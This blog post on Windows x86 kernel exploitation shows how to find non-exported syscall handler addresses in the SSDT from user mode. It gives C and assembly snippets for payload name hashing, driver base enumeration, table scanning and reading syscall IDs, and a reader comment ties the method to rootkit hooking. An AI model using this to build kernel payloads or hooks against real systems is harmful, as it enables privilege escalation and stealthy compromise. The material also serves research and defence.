Today, I would like to write about finding the addresses of non-exported kernel functions (syscall handlers) from user mode. The technique I am going to write about is my very own idea, that occured to me during one of my talks regarding Windows x86 kernel exploitation (greetings to suN8Hclf!). Despite this, I cannot guarantee that it hasn’t been invented and described by some independent authors a few months/years ago. If some of you – the readers – is aware of a similar publication, please let me know (I will surely publish some supplementary material to this post). Let’s get to the point…
The subject of practical vulnerability exploitation of the system kernel or one of its modules is simply too wide to entirely talk it over here. The technical aspects of making use of such vulnerabilities have already been described by a number of researchers, and the results of their work can be found, inter alia, there:
- Kernel-mode Payloads on Windows
- Remote Windows Kernel Exploitation – Step into the Ring 0
- How to exploit Windows kernel memory pool
A basic problem, usually encountered by a newbie reverser lurking in kernel-mode bugs, is how to take advantage of them in practice. When the vuln eventually makes it possible for you to execute your own code in the kernel context and create a relatively stable environment, the question is – what now? In reality, every single functionality we would like to implement, requires some external kernel functions to be used. In 99% cases, the module being imported from is simply ntoskrnl.exe (or any other kind of the kernel executable image). Many methods of finding its base address are available (i.e. Finding Ntoskrnl.exe Base Address @ Uninformed), that are mostly suitable for our purposes – hence I will not cover this subject today.
The next step towards creating a fully functional payload is obtaining the virtual addresses of specific functions we want to use. In the simpliest scenario, where we are only about to operate on exported functions, all we need is an easy way of parsing the internal Portable Executable structures, which can be implemented in “a few” lines, in fact. A very common enhancement is introducing a hash routine, used to convert long symbol names into short 16-32 bit values (as representative as the names themselves). The hashing algorithm doesn’t have to be complex at all – one simple bit operation like shifting is fairly enough for our purposes:
; ASSUMPTIONS: ESI = string to hash (input) ; EAX = return value (output) ; GenerateNameHash: xor eax, eax ; Zero out the EAX (hash) value @HashLoop: rol eax, 13 ; Rotate left by one xor al, byte [esi] ; Xor with the current char inc esi ; Increment pointer cmp byte [esi], 0 ; Check if NULL jnz @HashLoop ; If not, carry on ret ; EAX is already set, we have nothing to do - return
In most cases, we don’t even require more than the less-significant 16 bit part of the function’s result, therefore a great memory saving can be noted here. Whether such an optimization is necessary depends on the type of the vulnerability we’re dealing with, however we usually want to reduce the payload size to absolute minimum. All in all, what we are considering now is just getting access to publicly available addresses of the kernel image, which is not very hard to achieve. In my opinion, a much more interesting subject for a potential research would be searching for internal functions, not exported by the kernel in any way. In this case, we are forced to use harder techniques, based mostly on the particular operating system versions etc. Despite the fact that there aren’t too many universal problem solutions, some specific situations exist, in which we are able to get the address of a given internal function, under some special conditions.
In this particular case, the aforementioned conditions means functions belonging to SSDT (System Service Descriptor Table) – a simple array, containing pointers to functions responsible for handling various kinds of system calls triggered by user’s applications. Most of the syscall handlers are not directly exported by the kernel, though they turn out to be very useful when creating some advanced ring-0 payload. Furthermore, what should be noted, is that obtaining the address of an SSDT function is a trivial task from a driver’s level, provided we know the system call’s ID. In such case, the only “problem” is the way of retrieving the system version, in order to match a corresponding function number.
The same task is yet not so easy in user mode – here, the only solutions known by me are based on heuristic ideas, hence they cannot be considered 100% reliable regardless of the Windows version. What you can see below is a list of respective stages performed by an example application, illustrating the method I am writing about:
- Loading the kernel image into our process context – because of the fact that the ntoskrnl.exe file contents will be extensively used in the near future, we have to load it to the user-mode part of the process address space. Doing so makes it possible for us to refer “local” addresses of the exported functions in an easy and clean manner, thus lets us calculate the offset of any address, against the real kernel ImageBase. Since we are not treating the loaded image us a typical DLL library, we must ensure than no undesired operations are performed (such as calling the executable’s EntryPoint as if it was regular DllMain), but loading the file contents to memory. Thanks to the extended LoadLibraryEx functionality, we can use the DONT_RESLOVE_DLL_REFERENCES flag and avoid any unwanted side effects, as described:
If this value is used, and the executable module is a DLL, the system does not call DllMain for process and thread initialization and termination. Also, the system does not load additional executable modules that are referenced by the specified module.
- Choosing one, specific function that can be easily found inside SSDT, as well as on the kernel export list, i.e. NtCreateFile, NtCreateEvent, NtConnectPort, NtClose. This function is considerably important for us, since we know its exact address in the kernel-side memory (based on the real and “temporary” kernel ImageBase addresses), and we are able to designate addresses of any other SSDT function, providing we know its SyscallId value (can be dynamically obtained).
- Retrieving the ImageBase and ImageSize values of the loaded image, which can be done using one of the Process Status API function, that is – GetModuleInformation
- Getting the real system kernel address, required to point out the place of every function we are interested in. In this case, two functions seem especially useful – EnumDeviceDrivers and GetDeviceDriverBaseName (PSAPI). Using them, we can list and filter all the active kernel modules, including the kernel itself. The following piece of code aims to illustrate how the real ImageBase value is being queried:
DWORD GetDriverBaseAddr(const char* BaseName) { static LPVOID BaseAddresses[4096]; // XXX: let’s assume there are at most 4096 active device drivers DWORD cbNeeded; /* Get a list of all the drivers’ Image Base Addresses */ if(!EnumDeviceDrivers(BaseAddresses,sizeof(BaseAddresses),&cbNeeded)) return 0; CHAR FileName[MAX_PATH]; /* Go thru the entire list */ for( int i=0;i<(int)(cbNeeded/sizeof(LPVOID));i++ ) { /* For each image base, retrieve the driver’s name */ GetDeviceDriverBaseNameA(BaseAddresses[i],FileName,sizeof(FileName)); /* In case of the current module being kernel, return its base */ if(!_stricmp(FileName,BaseName)) return (DWORD)BaseAddresses[i]; } /* Should never get here */ return 0; }
- Scanning the memory of the already-loaded kernel image (user-mode) in search of the chosen function’s address (it is NtCreateFile for us). It is first – and the only – phase of the algorithm, presenting a heuristic approach. Its task is to find a place inside SSDT, where the exported function’s pointer is stored. This technique could possibly lead to false positives under certain conditions (when finding more than one matching signature), hence it is strongly advices to introduce some additional conditions to check. As we know that the only satisfying result is a place inside SSDT, we can assume that the adjacent values should also point inside the NTOSKRNL.EXE memory range. As it turns out, the above conditions are quite enough to reduce the false positives’ number to zero (on every Windows versions tested by me). Here’s the code, performing the described memory scanning:
for( PUCHAR i=(PUCHAR)KernelImageStart;i<(PUCHAR)KernelImageEnd-sizeof(DWORD);i++ ) { if(( *(DWORD*)(i+0) == SearchedFunctions[0].Address ) && ( *(DWORD*)(i-4) >= OrgKernelStart && *(DWORD*)(i-4) <= OrgKernelEnd ) && ( *(DWORD*)(i+4) >= OrgKernelStart && *(DWORD*)(i+4) <= OrgKernelEnd ) ) { printf("[+] Function pointer found at [0x%.8x]\n",(UINT)i); SearchedFunctions[0].SsdtAddress = (DWORD)i; break; } }
- Reading the system call ID numbers of the functions of interest. There is a very easy and reliable way of reading the system call number for any NTDLL wrapper, without any need to check the operating system version, or (what’s even worse), defining some static SyscallIds in the source. What we are taking advantage of is a specific build of the routines passing execution to kernel, which can be observed in the 2 following examples:
.text:7C90D090 ; __stdcall NtCreateFile(x, x, x, x, x, x, x, x, x, x, x) .text:7C90D090 _NtCreateFile@44 proc near .text:7C90D090 .text:7C90D090 B8 25 00 00 00 mov eax, 25h .text:7C90D095 BA 00 03 FE 7F mov edx, 7FFE0300h .text:7C90D09A FF 12 call dword ptr [edx] .text:7C90D09C C2 2C 00 retn 2Ch
and
.text:7C90D580 ; __stdcall NtOpenFile(x, x, x, x, x, x) .text:7C90D580 _NtOpenFile@24 proc near .text:7C90D580 .text:7C90D580 B8 74 00 00 00 mov eax, 74h .text:7C90D585 BA 00 03 FE 7F mov edx, 7FFE0300h .text:7C90D58A FF 12 call dword ptr [edx] .text:7C90D58C C2 18 00 retn 18h
As presented, we are able to obtain the syscall number by reading the 32-bit instruction operand from the [FunctionAddress+1] address. This is strongly related to the fact, that the first NTDLL wrapper function instruction is always
mov eax, SYSCALL_ID
where SYSCALL_ID is a complete, 32-bit number. In our case, the code responsible for retrieving the number of respective functions could look like this:
/* Get the SyscallId values for each function from the user-mode (ntdll.dll) code */ for( ULONG i=0;SearchedFunctions[i].FunctionName;i++ ) { HMODULE hNtdll = GetModuleHandle("ntdll.dll"); FARPROC pFunc = GetProcAddress(hNtdll,SearchedFunctions[i].FunctionName); /* Ignore invalid entries */ if(pFunc==NULL) continue; SearchedFunctions[i].SyscallId = *(DWORD*)(((DWORD)pFunc)+1); }
- Recalculating the SSDT functions’ addresses by performing the following steps:
- Getting a pointer value from the address:
(BaseFunction.Address + (BaseFunction.SyscallId - CurrentFunction.SyscallId)*sizeof(PVOID))
this is, the address constructed by moving the base routine address (NtCreateFile) back or forward, depending on the search function’s number.
- Converting the pointer to kernel-memory address:
CurrentFunction.KernelAddress = CurrentFunction.Address - LocalKernelImageBase + RealKernelImageBase
- Getting a pointer value from the address:
By performing the above steps, we can obtain the address of any system call handling function, on the condition that we have its user-mode correspondent exported by ntdll.dll (it is not necessary if we decide to use constant SyscallId numbers). What should be noticed is that the described method only enables us to get some kernel functions’ addresses – we are still forbidden to read or modify the memory pointed by these addresses. Because of this, the technique itself is not useful in the context of i.e. SSDT table contents validation check. However, it makes it lot easier for us to calculate and integrate the addresses with our shellcode yet before the exploitation process, which in turn improves the exploit writing comfort.
Some source code illustrating how the described technique works is available here (3kB).
Have fun && leave some comments! ;)
Witam,
Dokładnie kilka lat temu w podobny sposób do powyżej opisanego, rootkity pozyskiwały adresy usług systemowych nie eksportowanych przez jądro. Z tą różnicą, że robiły to z poziomu jądra wykorzystując fakt, iż biblioteka ntdll.dll jest z niego „dostępna”. Tu hxxp://www.rootkit.com/newsread.php?newsid=248 – Simple Hooking of Functions not Exported by Ntoskrnl.exe znajduje się materiał opisujący jak z poziomu jądra ręcznie zmapować obraz biblioteki ntdll.dll w celu pozyskania numerów usług eksportowanych przez tą bibliotekę.
Z mojego doświadczenia wynika, że w trakcie przygotowywania funkcjonalnego payloadu nie są potrzebne żadne nie eksportowane usługi systemowe (Jeśli ktoś posiada własną teorię na temat payloadu, do którego realizacji niezbędne były by usługi nie eksportowane przez jądro, to chętnie podejmę dyskusję na ten temat). Wszystkie potrzebne usługi (ZwXxx) oraz pozostałe funkcje są eksportowane przez jądro. W wielu przypadkach najskuteczniejsza metoda na pozyskanie dostępu do konkretnych pól struktur np. obiektu procesu (Token) polega na skorzystaniu ze sztywnych przesunięć specyficznych dla danej wersji systemu oraz SP. W podobny sposób można postąpić w celu określenia usług systemowych np. należących do ShadowTable.
Pozdrawiam,
Alex